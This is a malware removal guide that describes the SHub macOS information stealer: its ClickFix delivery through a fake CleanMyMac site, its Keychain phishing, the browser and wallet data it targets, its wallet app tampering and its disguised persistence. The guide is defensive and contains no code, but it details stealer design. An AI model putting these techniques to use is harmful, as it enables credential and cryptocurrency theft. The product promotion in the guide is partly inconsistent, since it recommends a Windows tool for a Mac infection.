How to remove SHub from infected macOS systems

What kind of malware is SHub?

SHub is an information stealer targeting macOS users. It can extract data from web browsers, cryptocurrency wallets, and other applications. Its distribution involves the use of a fake website and the ClickFix technique. If detected on a device, SHub should be eliminated as soon as possible.

SHub stealer overview

Initially, a loader runs on the victim's device. It checks the system before continuing. One check looks for a Russian keyboard. If it finds one, the malware stops and reports this to the attacker. If the check passes, the loader sends the IP address, hostname, macOS version, and keyboard language to cybercriminals.

Furthermore, a script that pretends to be a normal macOS password request is downloaded. If the victim types their password, the malware can unlock the Keychain, which stores all saved passwords, Wi-Fi logins, and private keys.

After the password is stolen, SHub scans the infected macOS system for various data. It targets over 10 Chromium-based browsers, including Arc, Brave, Chrome, Chrome Beta, Chrome Canary, Chrome DevTools, Chromium, Edge, Opera, Opera GX, Orion, Sidekick, Vivaldi, and Coccoc. It also targets Firefox, stealing saved passwords, cookies, and autofill data from all profiles.

Furthermore, SHub checks all installed browser extensions. It can steal information from over a hundred known cryptocurrency wallets, including Coinbase Wallet, Exodus Web3, Keplr, MetaMask, Phantom, and Trust Wallet.

SHub also targets desktop crypto wallet apps. It collects data from wallets such as Atomic Wallet, Binance, Bitcoin Core, BlueWallet, Coinomi, Dogecoin Core, Electrum, Exodus, Guarda, Ledger Live, Ledger Wallet, Litecoin Core, Monero, Sparrow, TON Keeper, Trezor Suite, Wasabi, and others.

Additionally, the stealer grabs data from Keychain, iCloud account data, Safari cookies and browsing history, Apple Notes databases, and Telegram session files. It also copies ".zsh_history", ".bash_history", and ".gitconfig" files, which may contain API keys or authentication tokens used by developers.

Other Capabilities

SHub not only steals data, but also modifies certain crypto wallet apps so it can keep stealing information later. If it finds wallets such as Atomic Wallet, Exodus, Ledger Live, Ledger Wallet, or Trezor Suite, it replaces the key app file ("app.asar") with a malicious version. This file runs in the background and keeps the app working normally.

The modified apps then send sensitive data to threat actors, such as wallet passwords, seed phrases, or recovery phrases. Some versions can show fake recovery or security update screens to trick users into entering their seed phrases.

Additionally, SHub plants a backdoor to keep access to the infected device. It creates a background task named "com.google.keystone.agent.plist" to look like Google's legitimate update service. Each time it runs, it starts a hidden script that sends the Mac's unique hardware ID to the server and checks for commands.

This lets attackers remotely control the device until the backdoor is found and removed. To avoid suspicion, SHub displays a fake error message stating that the app is not supported, leading the victim to believe the installation has failed.

Conclusion

SHub is a sophisticated macOS malware that gives attackers long-term, silent access to the victim's Mac and valuable information. Victims of these attacks can experience issues like identity theft, cryptocurrency loss, account hijacking, and other negative outcomes. Thus, it is important to be cautious to avoid the infection.

More examples of malware targeting macOS are Phexia, NovaStealer, and MacSync.

How did SHub infiltrate my device?

Cybercriminals use a fake CleanMyMac website to trick users into thinking they are downloading the legitimate app. Instead of downloading a normal installer, the site tells visitors to open Terminal and paste a command as part of the "installation". The distribution technique used in these attacks is called ClickFix.

When the user runs the command, it downloads a hidden script and executes it, leading to SHub's infiltration.

How to avoid malware?

Always download apps from official sources or trusted app stores, and avoid pirated software, cracks, or unofficial activators. Keep your operating system and programs up to date and scan your device regularly with trusted security software. Be careful with unexpected emails, messages, or attachments, and only open files or click links when you are sure they are safe.

Ignore suspicious ads, pop-ups, and links on untrustworthy sites, and never allow them to send notifications. If your computer is already infected, we recommend running a scan with Combo Cleaner Antivirus for Windows to automatically eliminate all threats.

The fake site (cleanmymacos[.]org) used to distribute SHub stealer (source: malwarebytes.com):

ClickFix instructions used to spread SHub stealer (source: malwarebytes.com):

Instant automatic malware removal:

Manual threat removal might be a lengthy and complicated process that requires advanced IT skills. Combo Cleaner is a professional automatic malware removal tool that is recommended to get rid of malware. Download it by clicking the button below:

By downloading any software listed on this website you agree to our Privacy Policy and Terms of Use. To use full-featured product, you have to purchase a license for Combo Cleaner. 7 days free trial available. Combo Cleaner is owned and operated by RCS LT, the parent company of PCRisk.com.

Quick menu:

• What is "SHub"?
• Remove SHub related files and folders from OSX.

Video showing how to remove adware and browser hijackers from a Mac computer:

Potentially unwanted applications removal:

Remove potentially unwanted applications from your "Applications" folder:

Click the Finder icon. In the Finder window, select "Applications". In the applications folder, look for "MPlayerX","NicePlayer", or other suspicious applications and drag them to the Trash. After removing the potentially unwanted application(s) that cause online ads, scan your Mac for any remaining unwanted components.

Frequently Asked Questions (FAQ)

My computer is infected with SHub malware, should I format my storage device to get rid of it?

This step will eliminate SHub, but it will also delete all data, so it should only be used as a last resort. Before taking this action, it is best to perform a full scan with reliable security software, such as Combo Cleaner.

What are the biggest issues that malware can cause?

Malware can give attackers remote access, steal personal information, install more malicious programs, delete or encrypt files, cause system crashes, slow down your device, and carry out other harmful activities.

What is the purpose of SHub?

SHub is malware that steals passwords, crypto wallets, and other sensitive data from macOS. It targets browsers, the Keychain, desktop and browser-based crypto wallets, and files like Apple Notes or Telegram sessions. Its main goal is to harvest information.

How did SHub infiltrate my device?

Attackers use a fake CleanMyMac website, which instructs visitors to open Terminal and paste a command to "install" the software. This delivery method is known as ClickFix. When the user runs the command, it silently downloads and runs a hidden script, allowing SHub to infect the Mac.

Will Combo Cleaner protect me from malware?

Yes, Combo Cleaner can detect and remove most known malware. However, advanced malware often hides deep within the system, so it is important to run a complete system scan.